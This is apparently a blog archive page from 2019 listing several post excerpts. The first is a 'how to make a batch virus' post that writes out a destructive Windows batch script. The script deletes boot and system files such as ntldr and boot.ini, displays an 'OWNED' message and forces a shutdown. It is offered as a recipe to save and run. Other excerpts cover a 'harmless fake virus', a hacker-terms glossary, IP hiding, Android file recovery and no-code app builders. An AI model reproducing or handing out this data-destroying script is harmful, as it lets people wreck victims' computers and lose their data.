Posts

Showing posts from August, 2019

How to make batch virus with bat extension

BATCH VIRUS VIRUS THAT CRASHESH ANY PC IN ONE SECOND WRITE FOLLOWING COMMANDS IN NOTEPAD AND THEN SAVE NOTEPAD AS HULK.BAT @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * YOU GOT OWNED!!! shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive save as bat file in notepad!! This will pop up a message saying OWNED!! and shut [...] Simple Fake-Virus Understand the following: It's just a harmless "virus". It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before! Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does. @echo off title %0 rem conditional check. echo welcome to this wonde...

15 common computer hacker terms

Image
Cyber security and the activities of computer hackers are very popular in news these days. Do you know about white hats,black hats and grey hats lets know about them and about other terms. Here is a list of some common terms used to describe hackers and their activities - particularly useful for those attending the cyber security session at the ICAS Conference Black hat Someone who carries out hacking for illegal purposes, usually for financial gain. They break into secure networks to destroy, ransom, modify or steal data, or to make the network unusable for authorised users. The name comes from the fact that the villains in old silent black and white western films were easily identified by cinema viewers because they wore black Stetsons whilst the “good guys” wore white hats. Back door A hidden “conduit” into a computer system that bypasses the orthodox protection of logins and passwords, thus making them basically ineffective in protec...

How to surf internet like hacker (ip hiding)

Image
                              How to Hide My IP Address Hiding an IP address is quite simple if you know which tools to use. If you’re like me, someone who wants to hide my ip in order to get access to geo-blocked sites, negate IP bans and just stay anonymous, keep reading........... .What is an IP Address? Let’s first get some basics out of the way. The internet, being nothing more than a vast group of interconnected networks, requires a system to establish communication between these networks. The Internet Protocol, usually referred to as IP, is the principal technology, responsible for this connection. IP is tasked with defining, structuring and delivering information packets from point A to point B. IP addresses are nothing more than system identiô€ƒ—ers. In version four of the internet protocol (IPv4), IP addresses are defined as a 32-bit number; x.x.x.x where x is a value betw...

How to recover deleted files from android OS

Image
InShort- Discussion about how to recover deleted files or data on android phone. Add caption Sometimes we removes some important files or data. As many people uses android smartphone and keeps their important daily use files or data in it. But what if you deletes data on your android ? In PC you can recover data when you deletes it you can easily restores it from Recycle Bin but sometimes when you permanently deletes files on you PC then you can easily recovers them by hard drive June 28 2018 How to Recover Deleted Files On Android recovery tool. Coming back to post that is How to Recover Deleted Files On Android. You can also recover files of android by recovery tools as always there are a lots of applications available on the internet on a particular thing but how to choose best one among them ? So, today I’m sharing the top best android data recovery tools I’m also using these apps/tools to recover my deleted files on android. Steps to Recover Delet...

Top 15 Best Ways To Make Android Apps Easily Without Coding

Image
Top 15 Best Ways To Make Android Apps Without Coding As you all know that Android is one of the most used mobile platform in the world. Android is free and open source operating system so one can easily customize this operating system. If you have much experience or thought about Android app’s but don’t have any coding experience, then this post is going to benefit you. You can easily create Android apps without any coding. Yes, it’s possible, now you can create Android apps quickly without having any knowledge of high knowledge of the coding language. In this article, we are discussing the same, So have a look at the complete guide explained below to proceed. #1 Mobile Roadie Mobile Roadie is an app that helps in creating and managing iOS or Android app. You can even use the free Mobile Roadie Connect app so that you can have a preview to your app accurately same as users on their devices. This app supports almost all types of media files, with automatic importing of...